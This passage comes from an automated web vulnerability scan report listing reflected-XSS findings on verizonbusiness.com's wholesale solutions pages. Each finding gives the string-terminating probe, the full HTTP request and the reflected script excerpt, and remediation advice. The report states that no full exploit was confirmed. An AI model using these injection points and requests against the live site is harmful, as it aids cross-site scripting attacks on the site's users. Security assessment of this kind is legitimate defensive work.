1.1036. http://www.verizonbusiness.com/solutions/wholesale/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc25d'%3bb77245645b7 was submitted in the REST URL parameter 2. This input was echoed as cc25d';b77245645b7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/wholesalecc25d'%3bb77245645b7/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:15 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41852
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/wholesalecc25d';b77245645b7/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1037. http://www.verizonbusiness.com/solutions/wholesale/ips/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/ips/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31205"%3b491529a82b2 was submitted in the REST URL parameter 1. This input was echoed as 31205";491529a82b2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions31205"%3b491529a82b2/wholesale/ips/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:38:51 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions31205";491529a82b2/wholesale/ips/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.1038. http://www.verizonbusiness.com/solutions/wholesale/ips/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/ips/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c40bf'%3bd88ad688d9c was submitted in the REST URL parameter 1. This input was echoed as c40bf';d88ad688d9c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsc40bf'%3bd88ad688d9c/wholesale/ips/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:04 GMT
Content-Type: text/html
Content-Length: 40648
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutionsc40bf';d88ad688d9c/wholesale/ips/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1039. http://www.verizonbusiness.com/solutions/wholesale/ips/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/ips/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a6ba'%3b9102d9997e9 was submitted in the REST URL parameter 2. This input was echoed as 8a6ba';9102d9997e9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/wholesale8a6ba'%3b9102d9997e9/ips/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:27 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41858
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/wholesale8a6ba';9102d9997e9/ips/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1040. http://www.verizonbusiness.com/solutions/wholesale/ips/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/ips/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62376"%3be410552c6eb was submitted in the REST URL parameter 2. This input was echoed as 62376";e410552c6eb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/wholesale62376"%3be410552c6eb/ips/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:17 GMT
Content-Type: text/html
Content-Length: 41860
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/wholesale62376";e410552c6eb/ips/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.1041. http://www.verizonbusiness.com/solutions/wholesale/ips/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/ips/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1359e"%3b0b09290ac43 was submitted in the REST URL parameter 3. This input was echoed as 1359e";0b09290ac43 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/wholesale/ips1359e"%3b0b09290ac43/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:38 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 42749
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/wholesale/ips1359e";0b09290ac43/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1042. http://www.verizonbusiness.com/solutions/wholesale/ips/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/ips/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5932b'%3b70e324aff24 was submitted in the REST URL parameter 3. This input was echoed as 5932b';70e324aff24 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/wholesale/ips5932b'%3b70e324aff24/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:39:53 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 42747
Date: Wed, 17 Nov 2010 00:39:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/wholesale/ips5932b';70e324aff24/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1043. http://www.verizonbusiness.com/solutions/wholesale/us/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/us/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a108'%3bcc97770411e was submitted in the REST URL parameter 1. This input was echoed as 8a108';cc97770411e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions8a108'%3bcc97770411e/wholesale/us/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:52 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/solutions8a108';cc97770411e/wholesale/us/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1044. http://www.verizonbusiness.com/solutions/wholesale/us/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/us/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4d16"%3be5812192d28 was submitted in the REST URL parameter 1. This input was echoed as c4d16";e5812192d28 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsc4d16"%3be5812192d28/wholesale/us/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:37 GMT
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionsc4d16";e5812192d28/wholesale/us/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS O
...[SNIP]...

1.1045. http://www.verizonbusiness.com/solutions/wholesale/us/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/us/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ad69"%3b86ccabfb7e6 was submitted in the REST URL parameter 2. This input was echoed as 1ad69";86ccabfb7e6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/wholesale1ad69"%3b86ccabfb7e6/us/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:00 GMT
Content-Type: text/html
Content-Length: 41856
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/wholesale1ad69";86ccabfb7e6/us/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT F
...[SNIP]...

1.1046. http://www.verizonbusiness.com/solutions/wholesale/us/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/us/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8628'%3b2c6094de57c was submitted in the REST URL parameter 2. This input was echoed as b8628';2c6094de57c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/wholesaleb8628'%3b2c6094de57c/us/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:17 GMT
Content-Type: text/html
Content-Length: 41856
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/wholesaleb8628';2c6094de57c/us/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1047. http://www.verizonbusiness.com/solutions/wholesale/us/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/us/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98b2d"%3b593fa051533 was submitted in the REST URL parameter 3. This input was echoed as 98b2d";593fa051533 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/wholesale/us98b2d"%3b593fa051533/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 42745
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
h(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/wholesale/us98b2d";593fa051533/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1048. http://www.verizonbusiness.com/solutions/wholesale/us/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/us/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62063'%3bfbe0bc90b1d was submitted in the REST URL parameter 3. This input was echoed as 62063';fbe0bc90b1d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/wholesale/us62063'%3bfbe0bc90b1d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:55 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 42745
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/wholesale/us62063';fbe0bc90b1d/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
